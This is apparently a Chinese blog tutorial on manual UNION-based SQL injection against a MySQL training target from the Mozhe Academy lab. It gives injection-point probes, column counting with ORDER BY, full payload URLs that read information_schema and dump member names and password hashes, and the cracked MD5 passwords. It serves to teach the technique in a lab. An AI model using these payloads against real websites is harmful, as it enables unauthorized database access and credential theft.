SQL手工注入(MySQL数据库)详解---靶机(墨者学院)

一、判断是否存在注入点

如果页面中MySQL报错,证明该页面中存在SQL注入漏洞:

  1. 单引号 ’ ----> 页面错误
  2. and 1=1 ----> 页面正常
  3. and 1=2 ----> 页面错误
  4. ?id=随意输入------>页面错误

二、Mysql数据库基本结构

MYSQL数据库
  数据库A=网站A=数据库用户A
    表名
          列名
              数据
  数据库B=网站B=数据库用户B
    表名
          列名
              数据
  数据库C=网站C=数据库用户C
    表名
          列名
              数据

三、information_schema 简述

  1. MySQL5.0版本以上新增 information_schema 数据库
  2. information_schema 数据库储存当前数据库下所有的数据库名、表名、字段名等信息。
  3. 数据库中符号“.”代表下一级,如xiao.user标识xiao数据库下的user表名

举例:

数据库表名含义
information_schema.tables记录所有表名信息的表
information_schema.columns记录所有列名信息的表
table_schema数据库名称
table_name表名
column name列名

四、手工注入过程详解

1. 判断注入点

?id=随意输入数字11265,页面返回错误,判断有注入点。
在这里插入图片描述

2. 判断列名数量(字段数)

order by X 根据返回页面正确与错误的临界值,判断临界值为4
在这里插入图片描述

在这里插入图片描述

3.判断可利用字段

将id值设置成不成立,即可探测到可利用的字段数,判断可利用字段数为2,3字段

http://219.153.49.228:47468/new_list.php?id=-1 union select 1,2,3,4

或者

http://219.153.49.228:47468/new_list.php?id=1 and 1=2 union select 1,2,3,4

在这里插入图片描述

4. 信息收集

类型sql函数查询到信息
数据库版本version()5.7.22-0ubuntu0.16.04.
数据库名字database()mozhe_Discuz_StormGroup
数据库用户user()root@localhost
操作系统@@version_compile_osLinux
http://219.153.49.228:47063/new_list.php?id=-1 union select 1,version(),database(),4
http://219.153.49.228:47063/new_list.php?id=-1 union select 1,user(),@@version_compile_os,4

在这里插入图片描述
在这里插入图片描述

5. 获取表名

数据库版本为5.7,利用information_schema数据库查询表名

http://219.153.49.228:47063/new_list.php?id=-1%20union%20select%201,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'

查询到指定数据库mozhe_Discuz_StormGroup下表名有:StormGroup_member,notice
在这里插入图片描述

6. 获取列名

利用 union select 联合查询,获取StormGroup_member表下的列名

http://219.153.49.228:47063/new_list.php?id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_name='StormGroup_member'

查询到列名有 id,name,password,status
在这里插入图片描述

7.获取指定数据

利用 union select 联合查询,获取指定数据,name,password。查询的时候尽量使用group_concat()防止漏数据

http://219.153.49.228:47063/new_list.php?id=-1 union select 1,group_concat(name),group_concat(password),4 from StormGroup_member

在这里插入图片描述

8.md5解密

356f589a7df439f6f744ff19bb8092c0 MD5解密 :dsan13

2d9dc71b7a2989dfb723ea224c73e7e7 MD5解密 :915944

9.登录获取KEY

在这里插入图片描述

  • 0
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

今天有点冷灬

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值